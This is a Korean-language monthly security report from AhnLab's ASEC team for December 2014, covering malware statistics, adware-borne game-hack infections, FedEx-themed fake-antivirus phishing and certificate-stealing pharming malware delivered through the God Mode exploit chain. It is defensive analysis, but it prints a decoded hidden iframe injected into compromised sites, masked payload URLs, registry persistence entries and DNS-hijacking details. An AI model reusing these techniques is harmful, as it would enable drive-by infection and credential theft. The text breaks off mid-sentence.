Security Trend ASEC Report VOL.60 December, 2014
ASEC Report VOL.60 December, 2014 ASEC(AhnLab Security Emergency response Center) 은악성코드및보안위협으로부터고객을안전하게지키기위하여보안전문가로구성된 글로벌보안조직입니다. 이리포트는주식회사안랩의 ASEC 에서작성하며, 매월발생한주요보안위협과이슈에대응하는최신보안기술에대한요약정 보를담고있습니다. 자세한내용은안랩닷컴 (www.ahnlab.com) 에서확인하실수있습니다. 2014 년 12 월보안동향 Table of Contents 1 보안통계 STATISTICS 01 악성코드통계 02 웹통계 03 모바일통계 4 6 7 2 보안이슈 SECURITY ISSUE 01 악성코드감염통로로이용되는애드웨어와 PUP 02 국제화물배송업체메일로위장한악성코드 가짜백신설치주의! 10 15 3 악성코드상세분석 Analysis-In-Depth 금융정보탈취형악성코드의보이지않는특징 19 4 연간위협동향 Annual Report 2014년보안위협동향 2014 보안위협, 영역과경계를파괴하다 2015년보안위협전망 2015년보안위협키워드, 다변화 고도화 타깃화 27 30 ASEC REPORT 60 Security Trend 2
1 보안통계 STATISTICS 01 악성코드통계 02 웹통계 03 모바일통계 ASEC REPORT 60 Security Trend
보안통계 01 악성코드통계 Statistics ASEC 이집계한바에따르면 2014 년 12 월한달간탐지된악성코드수는 2,695 만 5,828 건이다. 이는전 월 426 만 3,988 건보다 2,269 만 1,840 건증가한수치다. 한편 12 월에수집된악성코드샘플수는 607 만 9,293 건이다. [ 그림 1-1] 에서 탐지건수 란고객이사용중인 V3 등안랩의제품이탐지한악성코드의수를의미하며, 샘플 수집수 는안랩이자체적으로수집한전체악성코드의샘플수를의미한다. 30,000,000 26,955,828 20,000,000 10,000,000 6,000,000 5,000,000 4,000,000 4,065,620 4,263,988 3,000,000 2,000,000 1,000,000 0 4,572,315 6,059,563 6,079,293 탐지건수샘플수집수 10 월 11 월 12 월 [ 그림 1-1] 악성코드추이 (2014 년 10 월 ~ 12 월 ) ASEC REPORT 60 Security Trend 4
[ 그림 1-2] 는 2014 년 12 월한달간유포된악성코드를주요유형별로집계한결과이다. 불필요한프로그 램인 PUP(Potentially Unwanted Program) 가 64.49% 로가장높은비중을차지했고, 트로이목마 (Trojan) 계열의악성코드가 19.95%, 웜 (Warm) 이 4.48% 로그뒤를이었다. 0.35% 4.34% 4.48% 64.49% 6.39% 19.95% PUP Trojan etc Worm Adware Downloader [ 그림 1-2] 2014 년 12 월주요악성코드유형 [ 표 1-1] 은 12 월한달간가장빈번하게탐지된악성코드 10 건을진단명기준으로정리한것이다. PUP/ Win32.IntClient 가총 155 만 3,897 건으로가장많이탐지되었고, PUP/Win32.MyWebSearch 가 111 만 2,218 건으로그뒤를이었다. [ 표 1-1] 2014년 12월악성코드탐지최다 10건 ( 진단명기준 ) 순위 악성코드진단명 탐지건수 1 PUP/Win32.IntClient 1,553,897 2 PUP/Win32.MyWebSearch 1,112,218 3 PUP/Win32.Helper 1,078,083 4 PUP/Win32.Generic 921,610 5 PUP/Win32.SubShop 856,453 6 PUP/Win32.BrowseFox 447,719 7 PUP/Win32.MicroLab 385,872 8 Trojan/Win32.Gen 344,095 9 PUP/Win32.CrossRider 319,729 10 PUP/Win32.savepop 300,509 ASEC REPORT 60 Security Trend 5
보안통계 02 웹통계 Statistics 2014 년 12 월악성코드유포지로악용된도메인은 1,460 개, URL 은 1 만 1,612 개로집계됐다. 또한 12 월 의악성도메인및 URL 차단건수는총 642 만 752 건이다. 악성도메인및 URL 차단건수는 PC 등시스템 이악성코드유포지로악용된웹사이트의접속을차단한수이다. 7,000,000 6,000,000 6,081,235 6,330,313 6,420,752 5,000,000 4,000,000 3,000,000 2,000,000 40,000 30,000 20,000 10,000 1,365 18,431 946 6,018 1,460 11,612 악성도메인 /URL 차단건수 악성코드유포도메인수 0 10 월 11 월 12 월 악성코드유포 URL 수 [ 그림 1-3] 악성코드유포도메인 /URL 탐지및차단건수 (2014 년 10 월 ~ 12 월 ) ASEC REPORT 60 Security Trend 6
보안통계 03 모바일통계 Statistics 2014 년 12 월한달간탐지된모바일악성코드는 14 만 9,806 건으로집계되었다. 250,000 200,000 150,000 100,000 102,335 98,555 149,806 50,000 0 10 월 11 월 12 월 [ 그림 1-4] 모바일악성코드추이 (2014 년 10 월 ~ 12 월 ) ASEC REPORT 60 Security Trend 7
[ 표 1-2] 는 12 월한달간탐지된모바일악성코드유형중상위 10 건을정리한것이다. 특히 Android- PUP/SmsReg 가지난달보다 2 배가량증가한 4 만 148 건으로집계되었다. [ 표 1-2] 2014 년 12 월유형별모바일악성코드탐지상위 10 건 순위악성코드진단명탐지건수 1 Android-PUP/SmsReg 40,148 2 Android-Trojan/FakeInst 19,920 3 Android-PUP/Dowgin 13,824 4 Android-Trojan/Opfake 7,226 5 Android-Trojan/Mseg 6,248 6 Android-Trojan/SmsSpy 3,578 7 Android-Trojan/SmsSend 3,247 8 Android-PUP/Noico 2,578 9 Android-Trojan/SMSAgent 2,531 10 Android-PUP/Airpush 2,311 ASEC REPORT 60 Security Trend 8
2 보안이슈 SECURITY ISSUE 01 악성코드감염통로로이용되는애드웨어와 PUP 02 국제화물배송업체메일로위장한악성코드 가짜백신설 치주의! ASEC REPORT 60 Security Trend
보안이슈 01 악성코드감염통로로이용되는애드웨어와 PUP Security Issue 최근들어온라인게임핵 (Online GameHack) 의재감염사례가자주발견되고있다. 백신을통해악성코드를치료하더라도재부팅후다시감염되는증상이반복되었다. 보통악성코드를치료한후재부팅하여악의적인증상이재발하는지확인한다. 재부팅후에도악성코드가여전히동작하고있다는것은추가적인악성코드가남아있다는의미이다. 하지만이번경우에는온라인게임핵을유포하는애드웨어 (Adware) 가예약작업에등록되어있어지속적으로재감염시키고있었다. 그림 2-1 업데이트되는파일의아이콘 실제유포및업데이트되는파일의아이콘은 [ 그림 2-1] 과같다. 업데이트파일이실행되면 [ 표 2-1] 과같은파일이생성된다. 표 2-1 온라인게임핵관련생성파일 ( 상 )/ 애드웨어관련생성파일 ( 하 ) [ 파일생성정보 ] C: DOCUME~1 ADMINI~1 LOCALS~1 Temp [ 영문 & 숫자 ].exe ( 온라인게임핵드롭퍼 ) C: DOCUME~1 ADMINI~1 LOCALS~1 Temp A1.zip (ws2help.dll 정상파일 ) C: DOCUME~1 ADMINI~1 LOCALS~1 Temp B1.zip (wshtcpip.dll 정상파일 ) C: DOCUME~1 ADMINI~1 LOCALS~1 Temp C1.zip (version.dll 정상파일 ) C: DOCUME~1 ADMINI~1 LOCALS~1 Temp D1.zip (midimap.dll 정상파일 ) C: DOCUME~1 ADMINI~1 LOCALS~1 Temp yhsys doit. rar ( 손상된 PE) C: WINDOWS system32 drivers [ 영문 & 숫자 ].sys ( 온라인게임핵악성파일 ) C: DOCUME~1 ADMINI~1 LOCALS~1 Temp [ 영문 & 숫자 ].dll ( 온라인게임핵악성파일 ) C: WINDOWS system32 midimap.dll ( 온라인게임핵악성파일 ) C: WINDOWS system32 wshtcpip.dll ( 온라인게임핵악성파일 ) C: Program Files AdM***hing updater_temp.exe C: Program Files AdM***hing admsys.exe C: Documents and Settings Administrator Local Settings Temp 1680 adm***hing.dll C: Documents and Settings Administrator Local Settings Temp 2240 windo***ab.dll C: Documents and Settings Administrator Local Settings Temp 4373 AdM***hing.exe updater_temp.exe 파일이실행되면 C: DOCUME~1 ADMINI~1 LOCALS~1 ASEC REPORT 60 Security Trend 10
Temp [ 영문 & 숫자 ].exe 경로에파일을생성한다. 이파일은 [ 표 2-1] 의온라인게임핵관련파일들을생성하며악의적인행위를한다. 또한 [ 표 2-2] 의사이트에서파일을받아와실제애드웨어파일에대한설치와업데이트도이루어진다. 표 2-2 다운로드되는 PUP 주소 [ 네트워크정보 ] http://down.adm***hing.co.kr/download/dna/adm***.exe http://down.adm***hing.co.kr/download/dna/adm***hing.dll 현재는증상이나타나지않지만애드웨어 SSI 프로그램의업데이트과정에서유포된것으로확인된다. 만약비슷한증상으로지속적인재감염현상이나타나면 [ 시작프로그램 ] [ 예약작업 ] 에서해당프로그램의목록이있는지확인해야한다. 그림 2-2 전용백신치료화면 요즘에는인터넷에서필요한프로그램을쉽게구할수있다. 하지만프로그램구입과설치시주의가필요하다. 인터넷자료실사이트에서내려받은프로그램을설치했을뿐인데원하지않는프로그램이설치되었다. 이런프로그램은사용자모르게실행되는데평소에는아무런행위를하지않는다. 그러다사용자가인터넷익스플로러를실행하면광고창을띄워사용자에게불편을준다. 이처럼 PUP(Potentially Unwanted Program) 나애드웨어에의한악성코드유포는다수보고된바있다. 업데이트서버는단기간에여러 PC에서감염될수있는만큼제작사의관리와노력이필요하다. 악성코드에감염되었을경우에는 [ 그림 2-2] 와같이전용백신으로악성코드를치료한후애드웨어의예약작업및시작프로그램을제거하거나안랩의 V3 최신엔진으로정밀검사를하면치료가능하다. 그림 2-3 인터넷익스플로러사용시나타나는광고창 원하지않는프로그램이설치되는원인은사용자가프로그램을내려받고설치하는과정에서확인할수있다. 사용자는원하는프로그램을내려받기위해검색사이트를이용한다. 이때 PUP 제작자들은이점을노리고실제자료실사이트와유사한사이트를제작한다. 유사자료실사이트는검색사이트와블로그게시물의광고에노출되며, 사용자는이러한사이트를실제자료실사이트로착각한다. ASEC REPORT 60 Security Trend 11
사용자를속이는것은사이트에만국한되지않는다. 유사자료실사이트를통해내려받은프로그램의인터페이스는포털사이트의다운로더와비슷하게제작되어있어사용자가착각하기쉽다. 그림 2-4 검색사이트에노출된유사자료실사이트링크 그림 2-7 가짜전용다운로드프로그램 ( 상 ) / 포털자료실의프로그램다운로더 ( 하 ) 그림 2-5 블로그게시물광고에노출된유사자료실사이트링크 [ 그림 2-8] 의전용다운로드프로그램의실행화면을보자. 우측하단에 체크박스 와함께 프로그램명 이기재되어있다. 이렇게체크박스에체크된프로그램은 다운로드 버튼을누를때사용자가인지할수없도록설치된다. 그림 2-6 유사사이트 ( 상 ) / 포털사이트의자료실 ( 하 ) 그림 2-8 가짜전용다운로드프로그램 ASEC REPORT 60 Security Trend 12
또한원하지않게설치되는불필요한프로그램은육안으로는잘보이지않는사용자동의및약관을포함하고있다. 이와함께네트워크를통해불필요한프로그램의설치파일을다운로드한다. 실제프로그램의설치화면이나타나기때문에사용자는불필요한프로그램이함께설치되는것을인지하기어렵다. 표 2-3 네트워크연결정보 [ 네트워크연결정보 ] 그림 2-9 부실한이용약관 [ 그림 2-8] 과같이다운로드버튼을클릭하면네트워크를통해실제프로그램의설치파일을다운로드한다. 다운로드가완료되면프로그램설치화면이나타난다. 그림 2-10 실제프로그램의설치파일다운로드 http://uti*****.com/down2/ssetup.exe http://file.topinf*****.com/dst/toptooln_tn06.exe http://down.searc*****.co.kr/distribute/slslenska/searchlike.exe http://uti*****.com/down2/install.exe http://sub.sma***.co.kr/opapp/raonmedia/app/download/ smartweb_silent.exe http://down.pop*****.co.kr/download/poppinsearch_p_hinst.exe http://m.bt*****.com/fdwn/neo10/bt_neo1.exe http://down.microop*****.com/app/pn/mopop_p08_inst.exe http://app.koreanke*****.com/inst/elt10/wd_id01.exe http://update.medi*******.co.kr/bin/offmanagersetup.da.03.exe http://file.targetke*****.co.kr/app/newiniweblink/p061/ weblinkup.exe http://down.luck*****.net/lucky08/luckyinstall.exe http://down.*****ansupport.com/down/adinstall_wms007.exe http://his*****.or.kr/aaa/windowadvertisement_codenemo16.exe http://file.m***.co.kr/app/windowstab/windowstabsetup_ utilbada.exe http://yo*****.com/ins/part05_setup.exe http://up1.po*****.co.kr/etcapp/smartbar/xecuresetup.exe 다운로드된설치파일은자동으로실행되어 [ 표 2-4] 의경로에파일을생성하며 [ 프로그램추가 / 제거 ] 에설치된프로그램을등록한다. 이렇게생성된파일은시스템에광고팝업창을표시하여사용자에게불편을준다. 그림 2-11 실제프로그램의설치화면 ASEC REPORT 60 Security Trend 13
표 2-4 생성된파일경로 [ 파일경로 ] C: OffManager C: Program Files KoreanKeyword C: Program Files PoppinSearch C: Program Files sharebox_barcon C: Program Files TopToolN C: Program Files SmartWeb C: Program Files SpaceAD C: Program Files WindowAdvertisement C: Program Files XecrueCrossWeb C: Documents and Settings Administrator Local Settings Ap plication Data apps C: Documents and Settings Administrator Local Settings Ap plication Data searchlike C: Documents and Settings Administrator Local Settings Ap plication Data windowstab C: Documents and Settings Administrator Local Settings Ap plication Data wiseman C: Documents and Settings Administrator Local Settings Ap plication Data weblink C: Documents and Settings Administrator Local Settings Ap plication Data Windows BT Icons C: Documents and Settings Administrator Application Data luckytool C: Documents and Settings Administrator Application Data MOpop 사용자가원하지않게설치되는불필요한프로그램은광고를통한금전이득을목적으로이용된다. 프로그램제작자는목적달성을위해다수사용자에게광고를노출해야수익을얻을수있다. 그러려면프로그램제작자는많은사용자가설치할수있도록인기있는프로그램의설치파일로위장하여배포해야한다. 주목적이금전이득인만큼프로그램에대한보안관리는허술할수밖에없다. 이러한프로그램은악성코드제작자에의해악성코드감염통로로악용될수있으며 2차피해로이어질수있으므로주의가필요하다. [ 불필요한프로그램설치예방법 ] 1. 프로그램설치화면을주의깊게확인한다. 원하지않게설치되는불필요한프로그램은육안으로식별하기어려운부분에프로그램명과사용자동의여부를표기하기때문에프로그램설치전충분히확인해볼필요가있다. 2. 블로그게시물또는광고를통해연결되는사이트의파일은다운로드하지않는다. 블로그게시물의파일또는광고를통해연결되는사이트의파일로위장하는방법도불필요한프로그램제작자들이사용하는방법중하나이다. 3. 가능한신뢰할수있는사이트를이용한다. 프로그램의제작사홈페이지를이용한다. 한편, V3 제품군에서는관련악성코드를다음과같이 진단하고있다. 그림 2-12 [ 프로그램추가 / 제거 ] 에등록된원하지않는프로그램 <V3 제품군의진단명 > Trojan/Win32.Simda (2014.12.08.00) Trojan/Win32.NSAnti (2014.12.08.00) Trojan/Win32.OnlineGameHack (2014.12.11.00) PUP/Win32.WindowTab (2014.05.28.04) Adware/Win32.CloverPlus (2014.11.26.00) 외다수 ASEC REPORT 60 Security Trend 14
보안이슈 02 국제화물배송업체메일로위장한악성코드 가짜백신설치주의! Security Issue 최근 알뜰쇼핑족 이늘면서국내보다가격이저렴한수입제품을해외사이트에서직접구매하는 직구 이용자가증하고있다. 해외에서제품이배송되다보니주로국제화물배송업체 (FedEx, DHL, UPS 등 ) 를이용한다. 이과정에서국제화물배송업체의메일로위장한악성코드유포가과거부터꾸준히발생하고있다. 해외직구증가에따른악성코드감염피해도늘어날전망이다. 해당피해사례와유사한악성코드를확인해보자. [ 그림 2-14] 와같이첨부파일은압축되어있었으며압축을해제한결과문서파일의확장자 (.doc) 로위장한스크립트 (.js) 파일로확인되었다. 이러한형태의악성코드유포와관련하여한동안국내에서잠잠했던가짜백신 (FakeAV) 류의악성코드감염피해사례가발견되었다. [ 그림 2-13] 과같이페덱스 (FedEx) 로위장한메일이수신되었으며, 첨부파일을실행한후악성코드에감염되었다는피해사례가한개인블로그에서확인되었다. 그림 2-14 파일확장자확인 해당스크립트파일은난독화되어있으며실행시설정된 URL에서추가로악성코드다운로드를통해감염된다. 그림 2-13 수신된메일내용 출처 : http://niafilmuh.tistory.com/23 그림 2-15 스크립트난독화해제전 / 후 ASEC REPORT 60 Security Trend 15
[ 그림 2-15] 의 URL 을통해추가로파일이정상적으 로다운로드되면악성코드에감염되고 [ 그림 2-16] 과같은메시지가출력된다. 그림 2-17 허위감염알림창 그림 2-16 보안센터및허위위협탐지알림 그림 2-18 인터넷창을통한허위감염메시지 이는트레이알림을통해허위시스템감염알림창이뜨고보안센터를띄워가짜백신의실행을유도하려는의도로보인다. 가짝백신은허용된파일 (ThumbnailExtraction Host.exe, rundll32.exe, dllhost.exe, searc hprotocolhost.exe, wuauclt.exe, explorer. exe) 이외의실행파일실행시 [ 그림 2-17] 과같이감염된프로그램이라는메시지나 [ 그림 2-18] 과같이 시스템검사결과악성코드가다수발견되었다 는허위메시지를띄운다. 이와함께인터넷브라우저를실행한후사이트에접속하면 [ 그림 2-19] 와같이허위메시지를띄워가짜백신실행및결제페이지로유도한다. 그림 2-19 결제안내페이지 [ 그림 2-20] 과같이가짜백신은 AVLab Internet Security 라는이름으로실행되었다. 다른사례를보면 AVC Plus XP Antivirus 2015, AVC Plus 등의이름으로실행되는것이확인된다. ASEC REPORT 60 Security Trend 16
에는소위 APT(Advanced Persistent Threat, 지능형지속위협 ) 공격의수단으로자주이용되고있다. 이러한형태의악성코드유포는이미익숙한형태이다. 이를인지하고출처가불분명하거나확인되지않은내용의메일이나조금이라도의심스러운메일에대해서는주의가필요하다. 그림 2-20 가짜백신실행화면 이러한가짜백신 ( 허위백신 ) 은낯설지않지만한동안국내에서피해사례가거의발견되지않다가최근피해사례가다시발견됨에따라이에대한정보를파악하고피해예방을위한노력이필요하다. 스팸메일을통한악성코드유포는여전히계속되고있다. 스팸메일에첨부 ( 또는링크 ) 되는파일, 혹은첨부된파일을통해추가로다운로드되는파일에따라감염되는악성코드의형태는달라질수있다. 최근 V3 제품에서는관련악성코드를다음과같이진단하고있다. <V3 제품군의진단명 > JS/Downloader (2014.12.18.00) HTML/Cryptic (2014.12.18.00) Trojan/Win32.Necurs (2014.12.18.00) Trojan/Win32.Agent (2014.12.18.00) Trojan/Win32.XPack (2014.12.17.01) Trojan/Win32.MDA (2014.12.18.00) ASEC REPORT 60 Security Trend 17
3 악성코드상세분석 Analysis-In-Depth 금융정보탈취형악성코드의보이지않는특징 ASEC REPORT 60 Security Trend
악성코드상세분석 Analysis-In-Depth 금융정보탈취형악성코드의보이지않는특징 취약한웹사이트를통해감염되는파밍악성코드의행위분석취약한웹사이트를통한악성코드유포는오래전부터발견되었지만, 현재에도유포가활발하게진행되고있다. 이글에서소개하는침해사이트를통해유포되는악성코드는정상적인웹사이트에악성스크립트를삽입하는방식을이용하기때문에일반사용자는인식하기어렵다. 가삽입된사이트로리다이렉트 (redirect) 되어악성코드가다운로드및실행된다. 표 3-1 침해사이트에서접근하는사이트목록 URL http://ju**u.com http://www.pensio******.com http://www.******nsoo.co.kr 이때침해사이트의악성코드유포경유지를살펴보면 [ 그림 3-2] 와같다. 그림 3-2 악성코드유포경유지 침해사이트에는공격자가삽입한스크립트가존재하고있으며난독화되어있다. 그림 3-1 침해사이트 지금부터사용자가사이트에접속했을때악성코드가어떻게감염되는지그과정을살펴보자. 우선사용자가침해사이트페이지에접근하면악성스크립트 표 3-2 침해사이트에서로드하는파일에삽입된스크립트일부복호화된스크립트 "<iframe src=http://ju***.com/s**r/i**ex.h**l width=0 height=0></iframe>" ASEC REPORT 60 Security Trend 19
위의 [ 그림 3-2] 의침해사이트중가장마지막에접근하는사이트로부터최종적으로 v3c.exe 파일이다운로드된다. [ 그림 3-2] 와같이다운로드된파일은파밍악성코드로, 실행되면 DNS( 도메인네임시스템 ) 를변조하거나악성코드자신이 DNS 역할을한다. 해당악성코드의상세행위를살펴보면 [ 그림 3-3] 과같다. 표 3-4 레지스트리등록 Key HKLM SOFTWARE Microsoft Windows CurrentVersion Run syotom HKLM SYSTEM ControlSet001 Service s SharedAccess Parameters FirewallP olicy StandardProfile AuthorizedApplicat ions List C: inst.exe Value "C: inst.exe" "C: inst.exe:*: Enabled:Sevsl" HKCU Software Microsoft Internet "www.naver.com" Explorer Main Start Page 그림 3-3 다운로드된악성코드 악성코드가실행되면 [ 표 3-3] 과같이파일을추가로생성한다. 표 3-3 생성된파일 [ 그림 3-4] 와같이악성코드는시작프로그램에 inst. exe를등록하여윈도시작시마다자동실행시킨다. 또한윈도방화벽에예외로등록하여방화벽을우회한다. 추가로, 인터넷익스플로러의시작페이지를수정하여사용자가인터넷을사용할경우파밍사이트로자동연결하도록유도한다. 파일생성정보 C: inst.exe C: Documents and Settings Administrator Local Settings Temporary Internet Files Content.IE5 0B290PAN cgi_ personal_card[1] C: DOCUME~1 ADMINI~1 LOCALS~1 Temp f91d6992fc2 a47e9f9cb3ef9d27bf73f.zip 이가운데 inst.exe 파일은 [ 표 3-4] 와같이레지스 트리에등록한다. 그림 3-4 윈도방화벽에예외처리된악성코드 ASEC REPORT 60 Security Trend 20
위의 [ 표 3-6] 의경로에 NPKI 폴더가있을경우, [ 표 3-7] 의위치로복사하고 Temp 폴더에 zip 파일을생성하여 [ 그림 3-6] 과같이공격자의서버로전송한다. 그림 3-5 IE 시작페이지변경전 ( 상 )/ 후 ( 하 ) 표 3-7 복사된공인인증서위치 이악성코드가추가생성하는 cgi_personal_ card 파일은특정사이트로접근하며, 파밍에서사용될서버의 IP를확인하는데사용된다. [ 표 3-5] 는 cgi_personal_card 파일의내용이다. 운영체제 Windows XP Win7 이상 NPKI 폴더의복사된경로 C: Documents and Settings Administrator Lo cal Settings Temp Hs_ Pf NPKI C: Users [ 사용자계정 ] AppData Local Temp Hs_ Appdata NPKI 표 3-5 cgi_personal_card 파일내용 _Callback( { uin :305***6108, qzone :0, intimacyscore :0, nickname : ***.178.**.**6, realname :, smartname :, friendship :0, isfriend :0, bitmap : 08009c8002000101, avatarurl : http://q***o1.st**e.qq.com/**o ne/30***46108/305***6108/100 }); 악성코드에감염되면계속해서특정사이트로접근하여 cgi_personal_card 파일을생성한다. 이렇게공격자의 IP를가져온후악성코드는사용자 PC 에서공인인증서를탈취하고 PC의정보를전송한다. 표 3-6 PC에저장되는공인인증서위치 운영체제 NPKI 폴더경로 Windows XP C: Program Files NPKI Win7 이상 C: Users [ 사용자계정 ] AppData LocalLow NPKI 그림 3-6 압축된공인인증서전송표 3-8 맥주소 (MAC Address) 정보를가져오는함수 Function MACAddress() Dim mc,mo Set mc=getobject("winmgmts:").instancesof("win32_ NetworkAdapterConfiguration") For Each mo In mc If mo.ipenabled=true Then MACAddress= mo.macaddress Exit For End If Next End Function ASEC REPORT 60 Security Trend 21
또한 [ 표 3-8] 과같이함수를통해맥주소의정보를 가져와공격자의서버로전송한다. 그림 3-7 맥주소정보전송 이경우맥주소를전송하는 IP로접속하면 [ 그림 3-8] 과같이비밀번호 (P/W) 를입력하는창이나타난다. [ 그림 3-7] 의 Count.asp에서확인할수있듯이감염된사용자의카운팅및정보수집페이지로추정된다. 그림 3-9 맥정보및 DNS 정보 / DNS 변경전 ( 상 ) 과후 ( 하 ) [ 그림 3-9] 에서이악성코드가 DNS를변조하는이유는호스트 (hosts) 파일을변조하여파밍사이트로연결하는것이아닌, 로컬호스트 (127.0.0.1) 로루프백 (loopback) 을하여악성코드가 IP를변조한후공격자가제작한파밍사이트로접속하도록하기위해서이다. 그림 3-8 맥주소를전송하는페이지 또한이악성코드는변조에사용할 URL 목록을암호화된상태로가지고있다. 여기에서보조 DNS가 8.8.8.8로설정되는이유는악성코드가 DNS 역할을하지만, 파밍이목적이기때문에그에해당하는 URL만가지고있다. 그외다른사이트는정상적으로사용하도록하기위해구글의 DNS인 8.8.8.8로설정하는것이다. 또한이악성코드는 PC 의 DNS 를 [ 그림 3-9] 와같 이 127.0.0.1 / 8.8.8.8 로변조한다. 이악성코드에의해파밍에사용되는 URL 은 [ 표 3-9] 와같다. ASEC REPORT 60 Security Trend 22
표 3-9 파밍에사용되는 URL k****r.com ***p.i**.co.** www.k****r.com ***ank.i**.co.** ***nk.k****r.com ***nh**.com *mo**y.k****r.com www.***nh**.com H**ab***.com ***king.***nh**.com www.h**ab***.com ***bank.***nh**.com open.h**ab***.com ***ghy**.com k**c.co.** www.***ghy**.com www.k**c.co.** ***king.***ghy**.com **s.k**co.** **z.***ghy**.com k**.co.** **te.c** www.k**.co.** ***er.c** ***nk.k**.co.** www.***er.c** ***ine.k**.co.** **um.n** ***n.k**.co.** www.**um.n** ***rib***.com ***ma**.n** www.***rib***.com www.***ma**.n** u.***rib***.com **sa.k****r.com **b.***rib***.com **sa.***ghu**.com ***stb***.**.kr **sa.***nh**.com www.***stb***.**.kr **sa.***rib***.com **k.co.** **sa.**k.co.** www.**k.co.** **sa.***stb***.**.kr 이렇게악성코드에감염된 PC의사용자가인터넷익스플로러를실행하면 [ 그림 3-10] 과같이파밍사이트로연결된다. 사용자는정상사이트에접속하더라도해당사이트가침해사고를당했다면악성코드에감염될가능성이있다. 취약한웹사이트를통한악성코드유포과정 2014년에는리그 (Rig), 스위트오렌지 (Sweet Orange), 뉴클리어 (Nuclear) 등다양한웹익스플로잇킷 (Exploit Kit) 이등장하면서, 취약한웹사이트를악용한악성코드유포가급증하였다. 특히지금까지파밍악성코드유포에주로사용되었던 공다익스플로잇킷 & 카이홍익스플로잇킷 (Gongda Exploit Kit & Caihong Exploit Kit) 형태에서최근에는 카이홍익스플로잇킷 & 갓모드 (Caihong Exploit Kit & God Mode) 로유포형태가변화되어시선이집중되고있다. 갓모드취약점을이용한악성코드유포는 2014년 11월에등장하였으며, 이후 12월에 카이홍 & 갓모드 를이용한파밍악성코드유포가급증하고있어일반사용자들의주의가필요한시점이다. 최근에파밍악성코드유포로탐지된종교관련웹사이트의 URL Tree는 [ 표 3-10] 과같다. 표 3-10 웹사이트 URL Tree 순서 URL Root http://on***.com 1 http://on***.com/create***** - 해당사이트하위페이지에서공통적으로사용되는스크립트파일 그림 3-10 파밍사이트 ASEC REPORT 60 Security Trend 23
1-1 http://images.on***.com/com***_js/yutil.js - 다른경로의 YUtil.js로이동 1-2 http://crm.born*******.com/ad/s/yutil.js - 정상코드가작성되어있으나최하단에 iframe 삽입 : hg.gif 4 - PE http://www.oi**s.co.kr/***a/log/log.exe - PC내취약점존재할경우파밍악성코드감염 5 http://sol***ul.com/upload/ta**/b/main.html - God Mode 5 - PE http://www.oi**s.co.kr/***a/log/log.exe - PC내취약점존재할경우파밍악성코드감염 2 http://www.is****lplus.com/xml/hg.gif - iframe 삽입 : han.html 3 http://www.is*********.com/xml/han.html - iframe 삽입 : index.html / count( 감염수 ) 체크 [ 그림 3-11] 과같이갓모드공격에해당하는 main. html의중반부에는카이홍 (Caihong) 으로난독화되어있으며, 하단에는 VB스크립트코드가존재한다. VB스크립트는난독화된코드를복호화하고취약점 CVE-2014-6332를악용하여최종명령을실행한다. 4 http://sol***ul.com/upload/ta**/b/index.html - Caihong /ww.html (CVE-2011-2140 에 해당될경우 ) 그림 3-11 main.html 중카이홍으로난독화된부분 난독화된 index.html 복호화후 ( 아래 ) - 사용된취약점 : CVE-2013-0422, CVE-2012-4681, CVE-2011-3544, CVE-2013-0634, CVE-2011-2140 그림 3-12 1 차복호화된카이홍코드중일부 ASEC REPORT 60 Security Trend 24
그림 3-13 최종복호화된실행코드 갓모드공격의 CVE-2014-6332( 윈도 OLE 자동화배열원격코드실행취약점 ) 는윈도와인터넷익스플로러를사용하는대부분의환경 ( 윈도 95이상, IE 3~11) 에서동작할수있어그영향도가매우크다. 갓모드공격은 IE가 VB스크립트엔진을포함하는점을악용하는것으로, 공격자는 VB스크립트를통해시스템명령을실행할수있는권한을획득하여 VB스크립트를실행, 사용자 PC에악성코드를감염시킨다. 해당악성코드의상세한동작정보는위에서먼저살펴본침해사이트의악성코드행위와유사하다. CVE-2014-6332 취약점에대한패치는 2014년 11월에제공되었으나, 최신보안업데이트를진행하지않은경우에는갓모드기법을통해누구나쉽게악성코드에감염될수있어매우치명적이다. 인터넷은정보의바다이기도하지만, 그만큼악성코드또한많이배포되고있어사용자들은주의를기울여사용할필요가있다. 이러한파밍악성코드감염을예방하기위해서는보안업데이트를꼼꼼히확인하고, 설치한백신제품의엔진을최신버전으로유지하는사용자의올바른습관이선행되어야한다. 갓모드공격과안랩 MDS에서의 DICA 진단방식의자세한내용은안랩홈페이지보안이슈에서확인할수있다. http://www.ahnlab.com/kr/site/securityin fo/secunews/secunewsview.do?curpage =1&menu_dist=2&seq=23225&dir_group _dist=0 V3 제품군에서는관련악성코드를다음과같이진단 하고있다. <V3 제품군의진단명 > Trojan/Win32.Banker (2014.12.18.00) HTML/Cryptic (2014.12.18.00) Trojan/Win32.StartPage (2014.12.03.02) 그림 3-14 악성코드감염후포털접속및배너클릭시나타나는화면 ASEC REPORT 60 Security Trend 25
4 연간위협동향 Annual Report 2014년보안위협동향 2014년보안위협, 영역과경계를파괴하다 2015년보안위협전망 2015년보안위협키워드, 다변화 고도화 타깃화 ASEC REPORT 60 Security Trend
2014 년보안위협동향 2014 보안위협, 영역과경계를파괴하다 연초대규모개인정보유출부터연말공공기관해킹까지 2014년은사회전반에걸쳐 정보보안 ( 보호 ) 이핫이슈가된해였다. 특히개인정보유출사건 사고는거의매달발생했다고해도과언이아닐정도로, 안전행정부발표자료에따르면 2014년상반기에만 5,300만명의개인정보 8,600만여건이유출된것으로추정된다. 그야말로 보안위협 이개인과기업을넘나들며사회적 국가적피해를야기하고있다. 2014년의주요보안이슈는 스마트폰보안위협 인터넷뱅킹을노린파밍악성코드 공격경로의다양화 POS(Point-of-Sales) 시스템해킹 다수의오픈소스취약점등장등으로요약할수있다. 스마트폰, POS 시스템, 오픈소스등의키워드에서볼수있는것처럼지난한해보안위협은다양한플랫폼 (platform) 으로확대되었다. 1. 스마트폰으로확대되는보안위협지금까지주로 PC 환경에서자주등장했던보안위협이 2014년에는스마트폰환경으로옮겨가는한편본격적으로모바일환경에특화된보안위협이대거등장했다. 우선 랜섬웨어 (Ransomeware) 가 PC에이어스마트폰으로확산됐다. 사용자의데이터를볼모로금전을요구하는랜섬웨어는지난한해동안 PC와스마트폰등플랫폼을가리지않고꾸준히발견됐다. 해외에서는 FBI를사칭한조직이스마트폰사용자들을노리고유포한랜섬웨어인 심플로커 (SimpleLocker) 로실질적인피해가발생하기도했다. PC를노리던이른바 몸캠피싱 도스마트폰으로확대되기도했다. 몸캠피싱이란화상채팅등을통해음란행위를하는것을뜻하는 몸캠 과사용자를허위사이트또는프로그램으로유도하는, 즉낚는것을뜻하는 피싱 의합성어다. 스마트폰상에서의몸캠피싱기법은, 